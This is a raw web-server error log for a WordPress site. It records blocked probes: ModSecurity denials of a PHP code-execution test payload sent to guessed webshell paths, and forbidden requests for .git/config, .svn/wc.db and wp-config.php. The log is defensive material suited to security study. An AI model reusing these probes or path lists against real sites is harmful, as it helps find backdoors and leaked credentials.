"/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:google: die(md5(32434));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "ZtpScBZwmjFhWIYQyXN1YgAAAMA"] [Thu Sep 05 19:53:49.229181 2024] [:error] [pid 21612:tid 140690218501888] [client 134.209.115.186:33140] [client 134.209.115.186] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:google: die(md5(32434));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/geju.php"] [unique_id "ZtpSnRZwmjFhWIYQyXN1YwAAAM0"] [Thu Sep 05 19:54:28.399720 2024] [:error] [pid 21059:tid 140690294036224] [client 134.209.115.186:33142] [client 134.209.115.186] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:google: die(md5(32434));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/about.php"] [unique_id "ZtpSxDR0KcI850tOiz2BaAAAAEQ"] 2024/09/05 20:12:02 [error] 20933#20933: *144972 access forbidden by rule, client: 3.218.143.214, server: investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "investigacionperu.com" [Thu Sep 05 20:12:17.283257 2024] [:error] [pid 21612:tid 140690252072704] [client 151.80.67.229:33350] [client 151.80.67.229] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:google: die(md5(32434));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/admin.php"] [unique_id "ZtpW8RZwmjFhWIYQyXN1dgAAAMk"] [Thu Sep 05 20:12:49.462827 2024] [:error] [pid 21058:tid 140690302428928] [client 151.80.67.229:33354] [client 151.80.67.229] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:google: die(md5(32434));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/geju.php"] [unique_id "ZtpXER5Z66YYPYaZuMqI4QAAAAM"] [Thu Sep 05 20:13:48.581480 2024] [:error] [pid 21058:tid 140690159752960] [client 151.80.67.229:33360] [client 151.80.67.229] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:google: die(md5(32434));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "ZtpXTB5Z66YYPYaZuMqI4gAAABQ"] [Thu Sep 05 20:16:04.853390 2024] [:error] [pid 21612:tid 140690193323776] [client 151.80.67.229:33378] [client 151.80.67.229] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:google: die(md5(32434));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/about.php"] [unique_id "ZtpX1BZwmjFhWIYQyXN1eAAAANA"] [Thu Sep 05 20:16:28.079549 2024] [:error] [pid 21058:tid 140690193323776] [client 151.80.67.229:33390] [client 151.80.67.229] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:google: die(md5(32434));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/db-cache.php"] [unique_id "ZtpX7B5Z66YYPYaZuMqI5QAAABA"] [Thu Sep 05 20:17:05.155904 2024] [:error] [pid 21060:tid 140690400478976] [client 151.80.67.229:33402] [client 151.80.67.229] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:google: die(md5(32434));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/hoot.php"] [unique_id "ZtpYEZIS32OSfVXD8D6FwwAAAIA"] [Thu Sep 05 20:18:17.547555 2024] [:error] [pid 21060:tid 140690268858112] [client 151.80.67.229:33426] [client 151.80.67.229] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:google: die(md5(32434));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/admin.php"] [unique_id "ZtpYWZIS32OSfVXD8D6FxgAAAIc"] [Thu Sep 05 20:18:53.104893 2024] [:error] [pid 21058:tid 140690201716480] [client 151.80.67.229:33508] [client 151.80.67.229] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:google: die(md5(32434));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/admin.php"] [unique_id "ZtpYfR5Z66YYPYaZuMqI5wAAAA8"] [Thu Sep 05 20:19:05.867596 2024] [:error] [pid 21058:tid 140690285643520] [client 151.80.67.229:33510] [client 151.80.67.229] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:google: die(md5(32434));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp.php"] [unique_id "ZtpYiR5Z66YYPYaZuMqI6AAAAAU"] [Thu Sep 05 20:19:13.791634 2024] [:error] [pid 21058:tid 140690142967552] [client 151.80.67.229:33512] [client 151.80.67.229] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:google: die(md5(32434));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/about.php"] [unique_id "ZtpYkR5Z66YYPYaZuMqI6QAAABY"] [Fri Sep 06 03:18:50.699162 2024] [ssl:warn] [pid 11983:tid 139877991237504] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 06 03:18:50.943088 2024] [ssl:warn] [pid 11984:tid 139877991237504] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 06 03:18:51.459557 2024] [ssl:warn] [pid 11984:tid 139877991237504] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 06 03:18:53.719521 2024] [ssl:warn] [pid 11984:tid 139877991237504] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 06 03:18:56.097579 2024] [ssl:warn] [pid 12400:tid 139886325323648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 06 03:18:56.362981 2024] [ssl:warn] [pid 12401:tid 139886325323648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 06 03:21:41.814303 2024] [authz_core:error] [pid 12423:tid 139885994301184] [client 207.154.212.47:40074] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/06 03:21:46 [error] 12382#12382: *148340 access forbidden by rule, client: 207.154.212.47, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Sep 06 17:54:10.165444 2024] [authz_core:error] [pid 25225:tid 139885969123072] [client 206.189.233.36:54692] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/06 17:54:13 [error] 12381#12381: *158971 access forbidden by rule, client: 206.189.233.36, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Sep 07 03:22:38.933378 2024] [ssl:warn] [pid 3298:tid 139992384087936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 07 03:22:39.299234 2024] [ssl:warn] [pid 3299:tid 139992384087936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 07 03:22:39.893198 2024] [ssl:warn] [pid 3299:tid 139992384087936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 07 03:22:43.247596 2024] [ssl:warn] [pid 3299:tid 139992384087936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 07 03:22:45.619948 2024] [ssl:warn] [pid 3720:tid 140653283137408] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 07 03:22:45.959699 2024] [ssl:warn] [pid 3721:tid 140653283137408] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 07 04:30:12.742623 2024] [:error] [pid 3743:tid 140652956329728] [client 52.164.228.25:35564] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/afnew.php [Sat Sep 07 04:30:28.197254 2024] [autoindex:error] [pid 4412:tid 140653100390144] [client 52.164.228.25:35598] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Sep 07 04:30:44.895240 2024] [autoindex:error] [pid 3743:tid 140652939544320] [client 52.164.228.25:35640] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Sep 07 04:30:46.913289 2024] [autoindex:error] [pid 3741:tid 140652880795392] [client 52.164.228.25:35646] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Sep 07 04:30:48.024814 2024] [:error] [pid 3741:tid 140652897580800] [client 52.164.228.25:35650] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Sat Sep 07 04:30:51.037483 2024] [:error] [pid 3743:tid 140652922758912] [client 52.164.228.25:35658] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/autoload_classmap.php [Sat Sep 07 04:31:06.087774 2024] [autoindex:error] [pid 4412:tid 140652905973504] [client 52.164.228.25:35702] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Sep 07 04:31:06.150902 2024] [:error] [pid 3742:tid 140652956329728] [client 52.164.228.25:35704] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php [Sat Sep 07 04:31:07.134513 2024] [:error] [pid 4412:tid 140652864009984] [client 52.164.228.25:35708] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/makeasmtp.php [Sat Sep 07 04:31:27.726763 2024] [:error] [pid 4412:tid 140652880795392] [client 52.164.228.25:35754] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Sat Sep 07 04:31:30.511166 2024] [:error] [pid 4412:tid 140653100390144] [client 52.164.228.25:35764] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/radio.php [Sat Sep 07 04:31:35.056748 2024] [:error] [pid 4412:tid 140652998293248] [client 52.164.228.25:35780] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-config.php [Sat Sep 07 04:31:44.618154 2024] [autoindex:error] [pid 3741:tid 140652864009984] [client 52.164.228.25:35802] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Sep 07 04:31:51.136171 2024] [:error] [pid 3742:tid 140652838831872] [client 52.164.228.25:35818] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/plugins.php [Sat Sep 07 04:32:09.904359 2024] [:error] [pid 4412:tid 140652973115136] [client 52.164.228.25:35860] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sat Sep 07 04:32:24.159392 2024] [:error] [pid 3742:tid 140652981507840] [client 52.164.228.25:35904] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Sep 07 04:32:24.223340 2024] [:error] [pid 3742:tid 140652889188096] [client 52.164.228.25:35906] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Sep 07 04:33:03.929636 2024] [autoindex:error] [pid 4412:tid 140652905973504] [client 52.164.228.25:36010] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Sep 07 04:33:14.161389 2024] [autoindex:error] [pid 4412:tid 140652847224576] [client 52.164.228.25:36032] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Sep 07 04:33:15.313335 2024] [autoindex:error] [pid 3743:tid 140652947937024] [client 52.164.228.25:36036] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Sep 07 04:33:17.572374 2024] [:error] [pid 4412:tid 140652914366208] [client 52.164.228.25:36042] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sat Sep 07 04:33:17.636872 2024] [:error] [pid 4412:tid 140653100390144] [client 52.164.228.25:36044] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sat Sep 07 14:56:10.661526 2024] [autoindex:error] [pid 3741:tid 140652922758912] [client 40.80.160.119:45348] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Sep 07 14:56:17.139412 2024] [autoindex:error] [pid 3743:tid 140652864009984] [client 40.80.160.119:45354] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Sep 08 00:46:20.802820 2024] [autoindex:error] [pid 4412:tid 140652998293248] [client 4.213.113.19:57058] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Sep 08 03:42:37.419056 2024] [ssl:warn] [pid 28344:tid 140154918287232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 08 03:42:37.758886 2024] [ssl:warn] [pid 28345:tid 140154918287232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 08 03:42:38.362216 2024] [ssl:warn] [pid 28345:tid 140154918287232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 08 03:42:41.396839 2024] [ssl:warn] [pid 28345:tid 140154918287232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 08 03:42:43.804584 2024] [ssl:warn] [pid 28759:tid 140255072184192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 08 03:42:44.233873 2024] [ssl:warn] [pid 28760:tid 140255072184192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 08 03:42:45.214105 2024] [ssl:warn] [pid 28760:tid 140255072184192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 08 04:52:16.290459 2024] [authz_core:error] [pid 28915:tid 140254648403712] [client 207.154.197.113:60702] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/08 04:52:20 [error] 28876#28876: *176141 access forbidden by rule, client: 207.154.197.113, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Sep 08 07:24:21.307532 2024] [authz_core:error] [pid 29820:tid 140254623225600] [client 206.81.24.227:34352] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/08 07:24:26 [error] 28876#28876: *177373 access forbidden by rule, client: 206.81.24.227, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/09/08 14:03:40 [error] 28876#28876: *180299 access forbidden by rule, client: 195.178.110.135, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/09/08 14:56:15 [error] 28876#28876: *180554 access forbidden by rule, client: 15.222.13.8, server: investigacionperu.com, request: "GET /api/.git/config HTTP/1.1", host: "investigacionperu.com" 2024/09/08 14:56:15 [error] 28876#28876: *180555 access forbidden by rule, client: 15.222.13.8, server: investigacionperu.com, request: "GET /api/.git/config HTTP/1.1", host: "investigacionperu.com" 2024/09/08 14:57:40 [error] 28876#28876: *180556 access forbidden by rule, client: 3.96.177.111, server: investigacionperu.com, request: "GET /app/.git/config HTTP/1.1", host: "investigacionperu.com" 2024/09/08 14:57:40 [error] 28875#28875: *180557 access forbidden by rule, client: 3.96.177.111, server: investigacionperu.com, request: "GET /app/.git/config HTTP/1.1", host: "investigacionperu.com" 2024/09/08 15:10:20 